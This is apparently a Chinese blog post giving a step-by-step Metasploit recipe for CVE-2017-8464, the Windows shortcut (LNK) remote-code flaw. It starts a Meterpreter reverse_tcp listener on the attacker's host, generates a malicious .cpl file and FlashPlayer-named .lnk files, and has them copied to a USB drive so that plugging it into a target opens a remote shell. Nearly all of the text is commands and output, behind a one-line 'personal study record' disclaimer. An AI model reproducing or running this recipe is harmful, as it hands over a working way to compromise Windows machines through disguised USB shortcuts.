震网(远程快捷方式漏洞)

原创 于 2025-02-16 10:50:47 发布 · 359 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

1.启动监听

use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost yourip 
lhost => yourip
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     yourip   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > exploit -j

2.木马生成

msf6 exploit(multi/handler) > use exploit/windows/fileformat/cve_2017_8464_lnk_rce
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > set lhost yourip 
lhost => yourip 
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > exploit

[*] /root/.msf4/local/FlashPlayerCPLApp.cpl created, copy it to the root folder of the target USB drive
[*] /root/.msf4/local/FlashPlayer_D.lnk created, copy to the target USB drive
[*] /root/.msf4/local/FlashPlayer_E.lnk created, copy to the target USB drive
[*] /root/.msf4/local/FlashPlayer_F.lnk created, copy to the target USB drive
[*] /root/.msf4/local/FlashPlayer_G.lnk created, copy to the target USB drive
[*] /root/.msf4/local/FlashPlayer_H.lnk created, copy to the target USB drive
[*] /root/.msf4/local/FlashPlayer_I.lnk created, copy to the target USB drive
[*] /root/.msf4/local/FlashPlayer_J.lnk created, copy to the target USB drive
[*] /root/.msf4/local/FlashPlayer_K.lnk created, copy to the target USB drive
[*] /root/.msf4/local/FlashPlayer_L.lnk created, copy to the target USB drive
[*] /root/.msf4/local/FlashPlayer_M.lnk created, copy to the target USB drive
[*] /root/.msf4/local/FlashPlayer_N.lnk created, copy to the target USB drive
[*] /root/.msf4/local/FlashPlayer_O.lnk created, copy to the target USB drive
[*] /root/.msf4/local/FlashPlayer_P.lnk created, copy to the target USB drive
[*] /root/.msf4/local/FlashPlayer_Q.lnk created, copy to the target USB drive
[*] /root/.msf4/local/FlashPlayer_R.lnk created, copy to the target USB drive
[*] /root/.msf4/local/FlashPlayer_S.lnk created, copy to the target USB drive
[*] /root/.msf4/local/FlashPlayer_T.lnk created, copy to the target USB drive
[*] /root/.msf4/local/FlashPlayer_U.lnk created, copy to the target USB drive
[*] /root/.msf4/local/FlashPlayer_V.lnk created, copy to the target USB drive
[*] /root/.msf4/local/FlashPlayer_W.lnk created, copy to the target USB drive
[*] /root/.msf4/local/FlashPlayer_X.lnk created, copy to the target USB drive
[*] /root/.msf4/local/FlashPlayer_Y.lnk created, copy to the target USB drive
[*] /root/.msf4/local/FlashPlayer_Z.lnk created, copy to the target USB drive
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) >

3.将第二步生成的文件拷贝到U盘中,当U盘插入靶机后,会提示上线

注:本文仅为个人学习记录

clown_YZ
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值